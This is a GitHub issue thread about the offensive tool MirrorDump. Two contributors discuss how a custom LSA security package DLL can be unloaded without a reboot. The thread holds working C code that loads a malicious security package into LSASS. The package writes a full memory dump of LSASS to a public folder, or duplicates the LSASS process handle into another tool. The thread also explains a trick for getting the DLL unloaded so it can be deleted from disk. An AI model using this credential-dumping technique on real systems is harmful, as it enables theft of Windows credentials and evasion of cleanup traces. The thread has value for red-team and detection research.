### ISSUE TITLE
DLL unloading lock

### ISSUE THREAD

**Issue by hatRiot** [CCob/MirrorDump#1]
In the README you mention:

```
It turns out Microsoft have not implemented the DeleteSecuritPackage function even though it is documented on MSDN. So unfortunately a reboot is required to remove the LSA DLL. 
```
In testing, however, this doesn't appear totally accurate. I cobbled together a native implementation of the LSA package loader that does the following:

```
int main(int argc, char **argv)
{
	SECURITY_PACKAGE_OPTIONS spo = { 0 };
	SECURITY_STATUS status = AddSecurityPackageA((LPSTR)"dumper.dll", &spo);
	if (status != SEC_E_OK)
		printf("err: %08x\n", status);
	else
		printf("success\n");
	
	return 0;
}
```

And the package:

```
EXTERN_DLL_EXPORT NTSTATUS SpLsaModeInitialize(ULONG LsaVersion, PULONG PackageVersion, LPVOID ppTables, PULONG pcTables) {

    LoadLibraryA("DbgHelp.dll");
    MiniDump fp = (MiniDump)GetProcAddress(GetModuleHandleA("DbgHelp.dll"), "MiniDumpWriteDump");
    if (fp == NULL)
        return 1;

    HANDLE hOutput = CreateFileA("c:\\users\\public\\dump.txt", GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
    if (hOutput == INVALID_HANDLE_VALUE)
        return 1;

    fp(GetCurrentProcess(), GetCurrentProcessId(), hOutput, MiniDumpWithFullMemory, NULL, NULL, NULL);
    CloseHandle(hOutput);

    return 0;
}
```

This successfully generates an LSASS dump and unloads the DLL from memory.

I also tested this with MirrorDump; by commenting out the LSA generation code and modifying `SpLsaModeInitialize` like so:

```
EXTERN_DLL_EXPORT NTSTATUS SpLsaModeInitialize(ULONG LsaVersion, PULONG PackageVersion, LPVOID ppTables, PULONG pcTables) {
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    HANDLE hProcess = INVALID_HANDLE_VALUE, hTargetHandle = INVALID_HANDLE_VALUE;
    PROCESSENTRY32W entry = { 0 };
    entry.dwSize = sizeof(PROCESSENTRY32W);

    if (Process32First(snapshot, &entry) == TRUE)
    {
        while (Process32Next(snapshot, &entry) == TRUE)
        {
            if (wcscmp(entry.szExeFile, L"MirrorDump.exe") == 0)
            {
                hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, entry.th32ProcessID);
                break;
            }
        }
    }

    CloseHandle(snapshot);
    if (hProcess == INVALID_HANDLE_VALUE)
        return 1;

    DuplicateHandle(GetCurrentProcess(), GetCurrentProcess(), hProcess, &hTargetHandle, PROCESS_ALL_ACCESS, FALSE, 1);
    CloseHandle(hProcess);
    return 0;
```

This provided an LSASS dump and released the DLL, which I could then delete off disk.

The issue with MirrorDump appears to be the fact that `LsaProviderDuper.dll` is a .NET assembly, and thus requires loading into .NET's default AppDomain. Without some initial bootstrapping code to unload it (or rather, unload a custom AppDomain), it is not possible to unload the LSA provider, regardless of `DeleteSecurityPackage`.

**Comment by CCob** [comment]
Interesting.  I don't see a call to DeleteSecurityPackage which is the function that's not implemented, but I looks like when no function pointers are set in the table, it must unload the DLL anyway.  Nice find.

**Comment by hatRiot** [comment]
The loading routine occurs in `lsasrv.dll!SpmpLoadDll`, and the relevant portion:

```
_hLsaModule = LoadLibraryExW(lpLibFileName, 0i64, 0);
 if ( !_hLsaModule )
      goto LABEL_40;
 _SpLsaModeInitialize = GetProcAddress(_hLsaModule, "SpLsaModeInitialize");
if ( !_SpLsaModeInitialize )
   goto LABEL_54;
if ( ((int (__fastcall *)(__int64, int *, __int64 *, unsigned int *))_SpLsaModeInitialize)(
           0x10000i64,
           &uPackageVersion,
           &ppTables,
           &pcTables) < 0 )
      goto LABEL_54;
..
LABEL_54:
  FreeLibrary(_hLsaModule);
  return v3;
```

So if we return a value `< 0`, our function is still called but the package setup is never completed, thus no need to call `DeleteSecurityPackage`. The `FreeLibrary` call gets us ejected from the process. Leaving `ppTables` and `pcTables` empty gets us to the same place due to a failure further down in `SpmpLoadPackage`.

I'll close out this issue, just wanted to ensure it was documented for future reference.

**Comment by CCob** [comment]
Certainly something for me to look into.  I would expect the CLR to be started and shutdown in DllMain during  load/unload of the DLL.  A pretty useless feature otherwise if you can't unload CLR DLL's with exports.  Thanks for the analysis 👍
